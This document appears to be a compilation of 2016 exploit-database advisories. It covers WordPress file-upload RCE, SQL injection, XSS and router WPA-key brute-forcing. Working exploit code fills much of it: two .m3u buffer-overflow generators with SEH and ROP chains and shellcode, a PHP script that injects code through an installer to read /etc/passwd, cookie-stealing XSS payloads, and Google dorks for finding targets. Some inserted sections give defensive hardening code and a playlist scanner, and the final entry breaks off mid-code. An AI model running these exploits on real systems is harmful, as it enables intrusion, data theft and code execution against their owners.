
# Exploit Title: Wordpress Ultimate-Product-Catalog v3.8.6 Arbitrary file (RCE)
# Date: 2016-06-23
# Google Dork: Index of /wp-content/plugins/ultimate-product-catalogue/
# Exploit Author: Joaquin Ramirez Martinez [ i0akiN SEC-LABORATORY ]
# Vendor Homepage: http://www.EtoileWebDesign.com/
# plugin uri: http://www.etoilewebdesign.com/plugins/ultimate-product-catalog/
# Version: 3.8.6
# Tested on: windows 7 + Mozilla firefox. 
# Demo: https://youtu.be/FSRZlD3SVQc

====================
 DESCRIPTION
====================

An arbitrary file upload vulnerability has been detected in the WordPress Ultimate Product Catalogue Plugin v3.8.6 and below.
The vulnerability allows remote attackers to upload arbitrary files into the WordPress upload directory if the plugin is the premium version and the remote
attacker has an account (contributor, editor, author or administrator) that can manage this plugin.

===================
 STEPS TO REPRODUCE
===================

1.- Go to the "Custom fields" tab and add a new custom field of type "file".
2.- Go to the "Products" tab; the field you added previously is now shown.
3.- Select your PHP shell and save the product.
4.- Go to the URI "http(s)://<wp-host>/<wp-path>/wp-content/uploads/upcp-product-file-uploads/<your-shell-name>" and enjoy.

================
 Vulnerable code
================
Located in the `<upc-plugin-path>/Functions/Update_Admin-Databases.php` file, the function `UPCP_Handle_File_Upload` does not check file extensions.

function UPCP_Handle_File_Upload($Field_Name) {
	..
	if (!is_user_logged_in()) {exit();}
	/* Make sure that the file exists */
	elseif (empty($_FILES[$Field_Name]['tmp_name']) || $_FILES[$Field_Name]['tmp_name'] == 'none') {
		$error = __('No file was uploaded here..', 'UPCP');
	}
	/* Move the file and store the URL to pass it onwards*/
	else {
		$msg .= $_FILES[$Field_Name]['name'];
		//for security reason, we force to remove all uploaded file
		$target_path = ABSPATH . 'wp-content/uploads/upcp-product-file-uploads/';
		//create the uploads directory if it doesn't exist
		if (!file_exists($target_path)) {
			mkdir($target_path, 0777, true);
		}
		$target_path = $target_path . basename( $_FILES[$Field_Name]['name']);
		if (!move_uploaded_file($_FILES[$Field_Name]['tmp_name'], $target_path)) {
			//if (!$upload = wp_upload_bits($_FILES["Item_Image"]["name"], null, file_get_contents($_FILES["Item_Image"]["tmp_name"]))) {
			$error .= "There was an error uploading the file, please try again!";
		}
	...
}

?>
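A hardened replacement for the handler above, added here as an example and not taken from the plugin. It assumes it runs inside WordPress and relies on core functions (current_user_can, sanitize_file_name, wp_check_filetype_and_ext, wp_handle_upload); the allow-list of permitted types is an assumption chosen for a product-catalogue field.

```php
<?php
// Added example, not the plugin's code. Assumes a WordPress runtime.
function upcp_safe_handle_file_upload( $field_name ) {
    // wp_handle_upload() lives in an admin include that is not loaded on every request.
    require_once ABSPATH . 'wp-admin/includes/file.php';

    // Capability check instead of a bare is_user_logged_in(): a Contributor
    // account should not be able to place files under the web root at all.
    if ( ! current_user_can( 'upload_files' ) ) {
        return new WP_Error( 'upcp_forbidden', 'Insufficient permissions.' );
    }
    if ( empty( $_FILES[ $field_name ]['tmp_name'] ) ) {
        return new WP_Error( 'upcp_no_file', 'No file was uploaded.' );
    }

    // Explicit allow-list (assumed for this field) in WordPress' "ext|ext" => mime
    // format. Anything else, including .php/.phtml/.phar and double extensions,
    // fails the check below because no allowed extension matches.
    $allowed_mimes = array(
        'pdf'          => 'application/pdf',
        'jpg|jpeg|jpe' => 'image/jpeg',
        'png'          => 'image/png',
    );

    $file     = $_FILES[ $field_name ];
    $filename = sanitize_file_name( basename( $file['name'] ) );

    // Validate the extension AND the real content type of the temp file, not just the name.
    $check = wp_check_filetype_and_ext( $file['tmp_name'], $filename, $allowed_mimes );
    if ( empty( $check['ext'] ) || empty( $check['type'] ) ) {
        return new WP_Error( 'upcp_bad_type', 'File type not permitted.' );
    }
    // WordPress may return a corrected name when the extension lies about the content.
    if ( ! empty( $check['proper_filename'] ) ) {
        $filename = $check['proper_filename'];
    }
    $file['name'] = $filename;

    // Let WordPress move the file: unique filename, sane permissions (no mkdir 0777),
    // and the same MIME allow-list enforced a second time inside wp_handle_upload().
    $overrides = array(
        'test_form' => false,
        'mimes'     => $allowed_mimes,
    );
    $moved = wp_handle_upload( $file, $overrides );
    if ( isset( $moved['error'] ) ) {
        return new WP_Error( 'upcp_move_failed', $moved['error'] );
    }
    return $moved['url'];
}
```

Pairing this with a web-server rule that refuses to execute scripts under wp-content/uploads limits the impact even if a type check is ever bypassed.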

==========
 CREDITS
==========

Vulnerability discovered by:
	Joaquin Ramirez Martinez [i0akiN SEC-LABORATORY]
	joaquin.ramirez.mtz.lab[at]gmail[dot]com
	https://www.facebook.com/I0-security-lab-524954460988147/
	https://www.youtube.com/channel/UCe1Ex2Y0wD71I_cet-Wsu7Q


==========
time-line
==========

2015-08-08: vulnerability found
2016-06-21: Reported to vendor (No response)
2016-06-24: Public disclosure
===================================
            
@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@

Product -> OPAC KpwinSQL - SQL Injection
Date -> 6/24/2016
Author -> bRpsd
Skype: vegnox
Vendor HomePage -> http://www.kpsys.cz/
Product Download -> http://www.kpsys.cz/kpwinsql/demo.html
Product Version -> / All
SQL Version -> Firebird 1.5.3 
OS -> Win98SE, Me, NT, 2000, XP, 2003, Vista


Dork -> intitle:"WWW OPAC KpwinSQL"
Dork2 -> inurl:zaznam.php?detail_num=
Dork3 -> inurl:opacsql2_0

@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@


File: zaznam.php
Parameter: detail_num



Test > http://localhost:8888/zaznam.php?detail_num=1'


Response:

24-06-2016 08:52:21: localhost: CHYBA: 2 WARNING: ibase_query(): Dynamic SQL Error SQL error code = -104 Unexpected end of command - line 1, column 40 :In: "C:\wwwopac\functions.php" (Line: 5462) : URL:"/zaznam.php?detail_num=1%27"Pri zpracovani pozadavku doslo k chybe, omlouvame se ...
            
# Exploit Title: Magnet Networks – Weak WPA-PSK passphrases used in Tesley CPVA 642 Router
# Google Dork: 
# Date: 01/06/2016
# Author: Matt O'Connor
# Advisory Link:  https://www.rgb.ie/magnet-broadband-weak-wpa-psk-algorithm.pdf
# Version: 
# Category: Remote
# Tested on: Magnet Networks Tesley CPVA 642


The Tesley CPVA 642 routers supplied by Magnet Networks are vulnerable to an offline dictionary attack if the WPA-PSK handshake is obtained by an attacker.
 
The WPA-PSK pass phrase has the following features:

• Starts with MAGNET0
• Adds six random numerical digits 
• 1 million possible combinations ( MAGNET0000000 – MAGNET0999999 ) 
 
The entire keyspace can be generated using ATOM's "mask processor", writing the output to a file, for example:

./mp32 MAGNET0?1?1?1?1?1?1 > magnet_networks_tesley_ks.txt

The .txt file weighs in at around 45 MB.

Using a 1.4 GHz i3 processor in a budget laptop, we were hitting 1,000 keys per second. Breakdown below:

• 1,000,000 keys / 1,000 keys per second = 1,000 seconds
• 1,000 seconds / 60 = ~16 minutes

The WPA-PSK handshake we used has the password MAGNET0349325 and was cracked within ~6 minutes.

If you’re using the default password on your Magnet Networks Tesley CPVA 642 Router, we recommend changing it immediately to a more secure password, using a mix of letters, numbers and symbols.

On the 20th of June 2016, Magnet Networks Customer Care confirmed via email that these routers are not used by Magnet Networks anymore.
            
# Exploit Title: Codoforum v3.4 Stored Cross-Site Scripting (Stored XSS)
# Google Dork: intext:"powered by codoforum"
# Date: 01/06/2016
# Exploit Author: Ahmed Sherif (OffensiveBits)
# Vendor Homepage: http://codologic.com/page/
# Software Link: http://codoforum.com/index.php
# Version: V3.4
# Tested on: Linux Mint


1. Description:

The reply and search functionalities are both vulnerable to stored XSS due
to improper filtering when displaying the content of replies.


2. Steps to reproduce the vulnerability:


1. Log in to your account.
2. Look for any topic and add a reply.
3. In the reply textbox, add a widely used common keyword followed by an XSS
payload, for example: (keyword"><svg/onload=prompt(document.cookie)>)
4. When any user viewing the topic searches for that keyword, the
JavaScript code will be executed.



3. Solution:

The new version of codoforum will be released this week.
            

Option CloudGate Insecure Direct Object References Authorization Bypass


Vendor: Option NV
Product web page: http://www.option.com
Affected version: CG0192-11897

Summary: The CloudGate M2M gateway from Option provides competitively
priced LAN to WWAN routing and GPS functionality in a single basic unit
certified on all major US cellular operators (CDMA/EV-DO and WCDMA/HSPA+).
The CloudGate is simple to configure locally or remotely from your PC,
tablet or Smartphone.

Desc: Insecure Direct Object References occur when an application provides
direct access to objects based on user-supplied input. As a result of this
vulnerability attackers can bypass authorization and access resources and
functionalities in the system directly, for example APIs, files, upload
utilities, device settings, etc.

Tested on: lighttpd 1.4.39
           firmware 2.62.4


Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
                            @zeroscience


Advisory ID: ZSL-2016-5333
Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2016-5333.php


11.06.2016

--


GET /partials/firewall.html
GET /partials/system.html
GET /partials/ipsec.html
GET /partials/provisioning.html
GET /api/login
GET /api/replacementui
GET /api/goatgates

OR

/#/firewall
/#/system
/#/ipsec
/#/provisioning


XSS:

http://127.0.0.2/api/replacementui<script>alert(1)</script>
http://127.0.0.2/api/goatgates<script>alert(2)</script>
http://127.0.0.2/api/Blah-Blah<script>alert(3)</script>
http://127.0.0.2/api/<script>alert(4)</script>
            
#!/usr/bin/python

# Exploit Title: Mediacoder 0.8.43.5830 - Buffer Overflow SEH Exploit (.m3u)
# Date: 25-June-2016
# Exploit Author: Sibusiso Sishi 
# Email: sibusiso [at] IronSky [dot] co.za
# Vendor Homepage: http://www.mediacoderhq.com/
# Software Link: http://www.mediacoderhq.com/getfile.htm?site=mediatronic.com.au/download&file=MediaCoder-0.8.43.5830.exe
# Version: 0.8.43.5830
# Tested on: Windows XP SP3 EN



#msfvenom -a x86 --platform Windows -p windows/exec CMD=calc.exe -e x86/shikata_ga_nai -b '\x00\x0a\x0d\xff' -f c
shellcode = ("\xda\xca\xbb\x4a\xfa\x8e\x16\xd9\x74\x24\xf4\x5a\x29\xc9\xb1"
"\x31\x83\xc2\x04\x31\x5a\x14\x03\x5a\x5e\x18\x7b\xea\xb6\x5e"
"\x84\x13\x46\x3f\x0c\xf6\x77\x7f\x6a\x72\x27\x4f\xf8\xd6\xcb"
"\x24\xac\xc2\x58\x48\x79\xe4\xe9\xe7\x5f\xcb\xea\x54\xa3\x4a"
"\x68\xa7\xf0\xac\x51\x68\x05\xac\x96\x95\xe4\xfc\x4f\xd1\x5b"
"\x11\xe4\xaf\x67\x9a\xb6\x3e\xe0\x7f\x0e\x40\xc1\xd1\x05\x1b"
"\xc1\xd0\xca\x17\x48\xcb\x0f\x1d\x02\x60\xfb\xe9\x95\xa0\x32"
"\x11\x39\x8d\xfb\xe0\x43\xc9\x3b\x1b\x36\x23\x38\xa6\x41\xf0"
"\x43\x7c\xc7\xe3\xe3\xf7\x7f\xc8\x12\xdb\xe6\x9b\x18\x90\x6d"
"\xc3\x3c\x27\xa1\x7f\x38\xac\x44\x50\xc9\xf6\x62\x74\x92\xad"
"\x0b\x2d\x7e\x03\x33\x2d\x21\xfc\x91\x25\xcf\xe9\xab\x67\x85"
"\xec\x3e\x12\xeb\xef\x40\x1d\x5b\x98\x71\x96\x34\xdf\x8d\x7d"
"\x71\x2f\xc4\xdc\xd3\xb8\x81\xb4\x66\xa5\x31\x63\xa4\xd0\xb1"
"\x86\x54\x27\xa9\xe2\x51\x63\x6d\x1e\x2b\xfc\x18\x20\x98\xfd"
"\x08\x43\x7f\x6e\xd0\xaa\x1a\x16\x73\xb3")


seh = "\x94\x39\xf0\x64" #0x64f03994 pop ebx # pop esi # ret swscale-3.dll
nseh = "\xeb\x07\x90\x90" #JMP SHORT to nopsled which leads to the shellcode
nop_sled = "\x90" * 14

buff = "http:// " 
buff += "A" * 776
buff += nseh
buff += seh
buff += nop_sled
buff += shellcode
buff += "D" * (4216 - (len(shellcode + nop_sled)))
fo = open("foo.m3u", "wb")
fo.write (buff)
fo.close()
            
/*
[+] Credits: hyp3rlinx

[+] Website: hyp3rlinx.altervista.org

[+] Source:
http://hyp3rlinx.altervista.org/advisories/MYLITTLEFORUM-PHP-CMD-EXECUTION.txt

[+] ISR: APPARITIONSEC


Vendor:
=================
mylittleforum.net

Download:
github.com/ilosuna/mylittleforum/releases/tag/v2.3.5


Product:
===================
MyLittleForum 2.3.5

my little forum is a simple PHP and MySQL based internet forum that displays the messages in classical threaded
view (tree structure). The main claim of this web forum is simplicity. Furthermore it should be easy to install
and run on a standard server configuration with PHP and MySQL.


Vulnerability Type:
=======================
PHP Command Execution


CVE Reference:
==============
N/A


Vulnerability Details:
=====================

When setting up the mylittleforum CMS, users have to walk through an
installation script and provide details for the application such as the
forum's email address, name, admin email, admin password, database name,
etc.

However, no input validation or checks exist for that installation script.
Low-privileged users can then supply arbitrary PHP code as the
Database Name. The PHP command values are written to the
config/db_settings.php file and processed by the application. Since
we supply an invalid Database Name, a MySQL error is thrown, but the
injected PHP payload is also executed on the host system.

If the CMS is installed by a low-privileged user who has basic
MySQL database authorization to run the install for the CMS, this
can result in privilege escalation, remote command execution and complete
takeover of the host server.

The /config/db_settings.php file is protected by an .htaccess file, but we can write
directly to "db_settings.php" and execute code directly
from the /install/index.php file, bypassing any access control provided by the
.htaccess file, or we can just delete it by adding a call to the PHP function
@unlink('.htaccess') to our injected PHP payload.


1) Browse to http://localhost/mylittleforum-2.3.5/install/index.php


2) For Database Name input field enter the below PHP code for POC.
';?><?php echo passthru('/bin/cat /etc/passwd');'

This results in config/db_settings.php file being injected with our
arbitrary PHP code.
$db_settings['database'] = '';?><?php echo passthru('/bin/cat /etc/passwd');'';


3) Make another HTTP GET request to same page "/install/index.php" file and
done!... we access /etc/passwd system file.


HTTP/1.1 200 OK
Date: Fri, 24 Jun 2016 03:01:13 GMT
Server: Apache/2.4.12 (Unix) OpenSSL/1.0.1m PHP/5.6.8 mod_perl/2.0.8-dev
Perl/v5.16.3
X-Powered-By: PHP/5.6.8
Connection: close
Transfer-Encoding: chunked
Content-Type: text/html; charset=utf-8

root:x:0:0:root:/root:/bin/bash
bin:x:1:1:bin:/bin:/sbin/nologin
daemon:x:2:2:daemon:/sbin:/sbin/nologin
adm:x:3:4:adm:/var/adm:/sbin/nologin
lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin
sync:x:5:0:sync:/sbin:/bin/sync
shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown
halt:x:7:0:halt:/sbin:/sbin/halt
mail:x:8:12:mail:/var/spool/mail:/sbin/nologin
news:x:9:13:news:/etc/news:
uucp:x:10:14:uucp:/var/spool/uucp:/sbin/nologin
operator:x:11:0:operator:/root:/sbin/nologin
games:x:12:100:games:/usr/games:/sbin/nologin
gopher:x:13:30:gopher:/var/gopher:/sbin/nologin
ftp:x:14:50:FTP User:/var/ftp:/sbin/nologin
nobody:x:99:99:Nobody:/:/sbin/nologin

etc...


Exploit code(s):
===============

1) Download and unpack mylittleforum-2.3.5 upload to web server (Linux), chmod -R 777 etc...
2) Run below PHP script from Command line from remote work station
3) BOOM we can now read Linux "/etc/passwd" file on remote server
*/

<?php
#mylittleforum-2.3.5 PHP CMD Execution Exploit
#by hyp3rlinx
#ISR: apparitionsec
#hyp3rlinx.altervista.org
#cat Linux system file '/etc/passwd' POC
#tested RH Linux 5
#=======================================================

if($argc<5){
echo "myLittleForum CMS PHP Command Execution Exploit\r\n";
echo "Usage: <IP>,<MySQL-USER>,<MySQL-PASSWD>,<ROOT DIR>\r\n";
echo "================= by hyp3rlinx ===================\r\n";
exit();
}

$port=80;                   #Default port
$victim=$argv[1];           #IP
$user=$argv[2];             #MySQL username
$pwd=$argv[3];              #MySQL password
$root_dir=$argv[4];         #/mylittleforum-2.3.5
$uri="/install/index.php";  #PHP CMD inject entry point

$s = fsockopen($victim, $port, $errno, $errstr, 10);
if(!$s){echo "Cant connect to the server!"; exit();}

$CMD_INJECTION = "forum_name=PWN".
    "&forum_address=http://$victim/$root_dir/".
    "&forum_email=x@x.com".
    "&admin_name=$user".
    "&admin_email=x@x.com".
    "&admin_pw=$pwd".
    "&admin_pw_conf=$pwd".
    "&host=localhost".
    "&database=';?><?php echo passthru('/bin/cat /etc/passwd');'".
    "&user=$user".
    "&password=$pwd".
    "&table_prefix=mlf2_".
    "&install_submit=OK+-+Install+forum".
    "&language_file=english.lang";

#Inject commands
$out  = "POST /$root_dir/$uri HTTP/1.1\r\n";
$out .= "Host: $victim\r\n";
$out .= "Content-Type: application/x-www-form-urlencoded\r\n";
$out .= 'Content-Length: ' . strlen($CMD_INJECTION) . "\r\n";
$out .= "Connection: close\r\n\r\n";
fwrite($s, $out);
fwrite($s, $CMD_INJECTION);
fclose($s);
sleep(2);

#Second HTTP request to read Linux /etc/passwd file in the response
$s = fsockopen($victim, $port, $errno, $errstr, 10);
if(!$s){echo "Cant connect to the server!"; exit();}
$out  = "GET /$root_dir/$uri HTTP/1.1\r\n";
$out .= "Host: $victim\r\n";
$out .= "Connection: Close\r\n\r\n";
fwrite($s, $out);

$r = '';
while (!feof($s)) {
    $r = fgets($s, 128);
    echo $r;
    #stop once the HTML document starts; the injected output precedes it
    if(strpos($r, '<!DOCTYPE') !== FALSE){
        break;
    }
}
fclose($s);
?>

/*
Disclosure Timeline:
=================================
Vendor Notification: No Reply
June 27, 2016 : Public Disclosure


Exploitation Technique:
=======================
Remote


Severity Level:
===========================================
(High) 8.7
CVSS:3.0/AV:N/AC:L/PR:L/UI:R/S:C/C:H/I:H/A:N


[+] Disclaimer
The information contained within this advisory is supplied "as-is" with no
warranties or guarantees of fitness of use or otherwise.
Permission is hereby granted for the redistribution of this advisory,
provided that it is not altered except by reformatting it, and
that due credit is given. Permission is explicitly given for insertion in
vulnerability databases and similar, provided that due credit
is given to the author. The author is not responsible for any misuse of the
information contained herein and accepts no responsibility
for any damage caused by the use or misuse of this information. The author
prohibits any malicious use of security related information
or exploits by the author or elsewhere.

hyp3rlinx
*/
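How an installer can write user-supplied settings into a PHP config file so that a value like the one in the advisory above cannot break out of the string literal it lands in. This is an added example, not mylittleforum's code; the function names are assumptions and the demo input is constructed from the payload quoted above.

```php
<?php
// Added example, not part of mylittleforum. Function names are assumptions.

// Database names and table prefixes end up as SQL identifiers as well as
// config values, so they get a strict allow-list rather than escaping.
function validate_db_identifier( $name ) {
    return is_string( $name ) && preg_match( '/^[A-Za-z0-9_]{1,64}$/', $name ) === 1;
}

// Render config/db_settings.php content. Every value is emitted through
// var_export(), which produces a single-quoted PHP literal with ' and \ escaped,
// so quotes, "?>" and "<?php" inside a value stay inside the string.
function render_db_settings( array $settings ) {
    foreach ( array( 'database', 'table_prefix' ) as $key ) {
        if ( ! isset( $settings[ $key ] ) || ! validate_db_identifier( $settings[ $key ] ) ) {
            throw new InvalidArgumentException( "Invalid value for $key" );
        }
    }
    $lines = array( '<?php' );
    foreach ( $settings as $key => $value ) {
        if ( ! preg_match( '/^[a-z_]+$/', $key ) ) {
            throw new InvalidArgumentException( 'Invalid setting name' );
        }
        // Reject control bytes in any value; they have no place in a config file.
        if ( ! is_string( $value ) || preg_match( '/[\x00-\x1f\x7f]/', $value ) ) {
            throw new InvalidArgumentException( "Invalid value for $key" );
        }
        $lines[] = sprintf( '$db_settings[%s] = %s;', var_export( $key, true ), var_export( $value, true ) );
    }
    return implode( "\n", $lines ) . "\n";
}

// Constructed demo: the advisory's payload is rejected as a database name,
// and the same bytes supplied as a password are written as an inert literal.
$payload = "';?><?php echo passthru('/bin/cat /etc/passwd');'";
try {
    render_db_settings( array( 'database' => $payload, 'table_prefix' => 'mlf2_' ) );
} catch ( InvalidArgumentException $e ) {
    echo "rejected: " . $e->getMessage() . "\n";
}
echo render_db_settings( array(
    'host'         => 'localhost',
    'database'     => 'forum',
    'table_prefix' => 'mlf2_',
    'password'     => $payload,
) );
```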
            
# Exploit Title: Panda Security Privilege Escalation
# Date: 27/6/2016
# Exploit Author: Security-Assessment.com
# Vendor Homepage: http://www.pandasecurity.com
# Version: Panda Global Protection 2016 (16.1.2),Panda Antivirus Pro 2016 (16.1.2),Panda Small Business Protection (16.1.2),Panda Internet Security 2016 (16.1.2)
# Tested on: Windows 10

Panda Security – Privilege Escalation

(    , )     (,
  .   '.' ) ('.    ',
   ). , ('.   ( ) (
  (_,) .'), ) _ _,
 /  _____/  / _  \    ____  ____   _____
 \____  \==/ /_\  \ _/ ___\/  _ \ /     \
 /       \/   |    \\  \__(  <_> )  Y Y  \
/______  /\___|__  / \___  >____/|__|_|  /
        \/         \/.-.    \/         \/:wq
                    (x.0)
                  '=.|w|.='
                  _=''"''=.

		presents..
Panda Security - Privilege Escalation
Affected Software -
	Panda Global Protection 2016 (16.1.2)
	Panda Antivirus Pro 2016 (16.1.2)
	Panda Small Business Protection (16.1.2)
	Panda Internet Security 2016 (16.1.2)
Testing Environment - Windows 10
PDF: http://www.security-assessment.com/files/documents/advisory/Panda%20Security%20-%20Privilege%20Escalation.pdf

+-------------+
| Description |
+-------------+
Multiple Panda Security products are vulnerable to local privilege escalation. As the USERS group has write permissions over the folder where the PSEvents.exe process is located, it is possible to execute malicious code as Local System.

+--------------+
| Exploitation |
+--------------+
“PSEvents.exe” is scheduled to be executed every hour with SYSTEM Privileges. When executed, it tries to locate a number of DLLs in its local directory to be loaded. However, some of these DLLs don’t exist.
 
The DACLs of the directory that contains the “PSEvents.exe” executable allow a user in the USERS group to create files in that directory. A malicious user can exploit this vulnerability by creating a malicious DLL file in that directory and naming it as one of the missing DLLs. After one hour, the “PSEvents.exe” process will start and load the malicious DLL.

The same method can be used to exploit other executables (PSDevice.exe and PSProfiler.exe) located in Panda’s Downloads directory.


+----------+
| Solution |
+----------+
Install Panda’s Hotfix for this vulnerability.
http://www.pandasecurity.com/uk/support/card?id=100053

+----------+
| Timeline |
+----------+
10/5/2016 - Exchange PGP
11/5/2016 - Advisory sent to Panda Security
14/5/2016 - Confirm receipt of the advisory
23/5/2016 - Email Panda Security for update
01/6/2016 - Panda Security reply that they have a fix in development.
16/6/2016 - Panda Security send hotfix to verify if it fixes the vulnerability.
21/6/2016 - Panda Security schedule to release the hotfix on 24/6/2016
24/6/2016 - Hotfix released
27/6/2016 - Advisory released 

+-------------------------------+
| About Security-Assessment.com |
+-------------------------------+
Security-Assessment.com is a leading team of Information Security consultants specialising in providing high quality Information Security services to clients throughout the Asia Pacific region. Our clients include some of the largest globally recognised companies in areas such as finance, telecommunications, broadcasting, legal and government. Our aim is to provide the very best independent advice and a high level of technical expertise while creating long and lasting professional relationships with our clients.

Security-Assessment.com is committed to security research and development, and its team continues to identify and responsibly publish vulnerabilities in public and private software vendor's products. Members of the Security-Assessment.com R&D team are globally recognised through their release of whitepapers and presentations related to new security research.

For further information on this issue or any of our service offerings, contact us:

Web www.security-assessment.com
Email info () security-assessment.com
Phone +64 4 470 1650
            
#!/usr/bin/env python
#
# Exploit Title: VUPlayer <=2.49 .M3u Buffer overflow exploit with DEP bypass
# Date: 26-06-2016
# Exploit Author: secfigo
# Vendor Homepage: http://vuplayer.com/
# Software Link: https://www.exploit-db.com/apps/39adeb7fa4711cd1cac8702fb163ded5-vuplayersetup.exe 
# Version: VUPlayer <=2.49
# Tested on: Windows 7 SP1 DEP=alwayson
# Greetz: Raghu, nullSingapore
###################################################################################


import struct

###################################################################################
# Shellcode
# windows/exec CMD=calc.exe with size 227 and bad characters "\x00\x09\x0a\x0d\x1a"
###################################################################################

shellcode = ("\xbb\xc7\x16\xe0\xde\xda\xcc\xd9\x74\x24\xf4\x58\x2b\xc9\xb1"
"\x33\x83\xc0\x04\x31\x58\x0e\x03\x9f\x18\x02\x2b\xe3\xcd\x4b"
"\xd4\x1b\x0e\x2c\x5c\xfe\x3f\x7e\x3a\x8b\x12\x4e\x48\xd9\x9e"
"\x25\x1c\xc9\x15\x4b\x89\xfe\x9e\xe6\xef\x31\x1e\xc7\x2f\x9d"
"\xdc\x49\xcc\xdf\x30\xaa\xed\x10\x45\xab\x2a\x4c\xa6\xf9\xe3"
"\x1b\x15\xee\x80\x59\xa6\x0f\x47\xd6\x96\x77\xe2\x28\x62\xc2"
"\xed\x78\xdb\x59\xa5\x60\x57\x05\x16\x91\xb4\x55\x6a\xd8\xb1"
"\xae\x18\xdb\x13\xff\xe1\xea\x5b\xac\xdf\xc3\x51\xac\x18\xe3"
"\x89\xdb\x52\x10\x37\xdc\xa0\x6b\xe3\x69\x35\xcb\x60\xc9\x9d"
"\xea\xa5\x8c\x56\xe0\x02\xda\x31\xe4\x95\x0f\x4a\x10\x1d\xae"
"\x9d\x91\x65\x95\x39\xfa\x3e\xb4\x18\xa6\x91\xc9\x7b\x0e\x4d"
"\x6c\xf7\xbc\x9a\x16\x5a\xaa\x5d\x9a\xe0\x93\x5e\xa4\xea\xb3"
"\x36\x95\x61\x5c\x40\x2a\xa0\x19\xbe\x60\xe9\x0b\x57\x2d\x7b"
"\x0e\x3a\xce\x51\x4c\x43\x4d\x50\x2c\xb0\x4d\x11\x29\xfc\xc9"
"\xc9\x43\x6d\xbc\xed\xf0\x8e\x95\x8d\x97\x1c\x75\x7c\x32\xa5"
"\x1c\x80")

junk = "HTTP://" + "A"*1005




###################################################################################
# rop gadgets with some modifications
# bad characters = "\x00\x09\x0a\x0d\x1a"
###################################################################################

def create_rop_chain():

    # rop chain generated with mona.py - www.corelan.be
    rop_gadgets = [
      0x10010157,  # POP EBP # RETN [BASS.dll] 
      0x10010157,  # skip 4 bytes [BASS.dll]
      0x10015f77,  # POP EAX # RETN [BASS.dll] 
      0xfffffdff,  # Value to negate, will become 0x00000201
      0x10014db4,  # NEG EAX # RETN [BASS.dll] 
      0x10032f72,  # XCHG EAX,EBX # RETN 0x00 [BASS.dll] 
      0x10015f82,  # POP EAX # RETN [BASS.dll] 
      0xffffffc0,  # Value to negate, will become 0x00000040
      0x10014db4,  # NEG EAX # RETN [BASS.dll] 
      0x10038a6d,  # XCHG EAX,EDX # RETN [BASS.dll] 
      0x101049ec,  # POP ECX # RETN [BASSWMA.dll] 
      0x101082db,  # &Writable location [BASSWMA.dll]
      0x1001621c,  # POP EDI # RETN [BASS.dll] 
      0x1001dc05,  # RETN (ROP NOP) [BASS.dll]
      0x10604154,  # POP ESI # RETN [BASSMIDI.dll] 
      0x10101c02,  # JMP [EAX] [BASSWMA.dll]
      0x10015fe7,  # POP EAX # RETN [BASS.dll] 
      0x1060e25c,  # ptr to &VirtualProtect() [IAT BASSMIDI.dll]
      0x1001d7a5,  # PUSHAD # RETN [BASS.dll] 
      0x10022aa7,  # ptr to 'jmp esp' [BASS.dll]
    ]
    return ''.join(struct.pack('<I', _) for _ in rop_gadgets)

rop_chain = create_rop_chain()


eip = struct.pack('<L',0x10601033) # RETN (BASSMIDI.dll)

nops ="\x90"* 16

buffer = junk + eip + rop_chain + nops+ shellcode+ "C"*(3000-len(junk)-len(eip)-len(rop_chain)-len(nops)-len(shellcode))

print "[+] Creating .m3u file of size " + str(len(buffer))
# write in binary mode so no byte of the payload is translated
file = open('vuplayer-dep.m3u', 'wb')
file.write(buffer)
file.close()
print "[+] Done creating the file"
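A defender-side triage check covering both .m3u exploits above (MediaCoder and VUPlayer), added as an example and not part of either script. A legitimate playlist holds short paths or URLs, whereas an SEH or ROP payload needs one entry of hundreds to thousands of bytes built from filler and non-printable bytes; the length threshold and the sample inputs below are constructed for the demonstration.

```php
<?php
// Added example, not from either exploit. Thresholds are assumptions.
function scan_m3u_entries( $content, $max_entry_len = 260 ) {
    $findings = array();
    // Split on any line ending; the crafted files contain no newline at all,
    // so a single oversized "line" is the common case.
    $lines = preg_split( "/\r\n|\n|\r/", $content );
    foreach ( $lines as $idx => $line ) {
        if ( $line === '' || $line[0] === '#' ) {
            continue; // #EXTM3U / #EXTINF directives and blank lines
        }
        $len     = strlen( $line );
        $reasons = array();
        if ( $len > $max_entry_len ) {
            $reasons[] = "entry length $len exceeds $max_entry_len";
        }
        // Bytes outside printable ASCII: shellcode, gadget addresses, NOP sleds.
        $non_printable = preg_match_all( '/[^\x20-\x7e]/', $line );
        if ( $non_printable > 0 ) {
            $reasons[] = "$non_printable non-printable byte(s)";
        }
        // A run of 100+ copies of one byte is the padding both scripts use.
        if ( preg_match( '/(.)\1{99,}/s', $line, $m ) ) {
            $reasons[] = sprintf( 'run of repeated byte 0x%02x', ord( $m[1] ) );
        }
        if ( $reasons ) {
            $findings[] = array( 'line' => $idx + 1, 'length' => $len, 'reasons' => $reasons );
        }
    }
    return $findings;
}

// Constructed samples: a benign playlist and one shaped like the files above
// (scheme prefix, long filler, then arbitrary bytes).
$benign  = "#EXTM3U\n#EXTINF:123,Track\nhttp://example.invalid/song.mp3\n";
$suspect = "http://" . str_repeat( "A", 1005 ) . "\x33\x10\x60\x10" . str_repeat( "\x90", 16 );

print_r( scan_m3u_entries( $benign ) );
print_r( scan_m3u_entries( $suspect ) );
```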
            
######################
# Application Name : Kagao v3.0 - Professional Classified Market

# Google Dork : inurl:/cat1.php?id2=

# Exploit Author : Cyber Warrior | Bug Researchers Group | N4TuraL

# Vendor Homepage : http://kogaoscript.com/

# Vulnerable Type : SQL Injection & Cross Site Scripting

# Date : 2016-06-26

# Tested on : Windows 10 / Mozilla Firefox
#             Linux / Mozilla Firefox
#             Linux / sqlmap 1.0.6.28#dev

###################### SQL Injection Vulnerability ######################

# Location :
http://localhost/[path]/cat1.php

######################

# Vulnerable code :

function pagenat(){

	$buildLink = array(
		"id" => intval($_GET['id']),
		"id2" => isset($_GET['id2']) ? intval($_GET['id2']) : '',
		"suche" => htmlspecialchars($_GET['suche']),
		"sucheWo" => htmlspecialchars($_GET['sucheWo']),
		"umkreis" => intval($_GET['umkreis']),
		"page" => ""
	);

	$buildLink = http_build_query($buildLink);
	$buildLink = 'cat1.php?' . $buildLink;

	if($_GET['id2']){
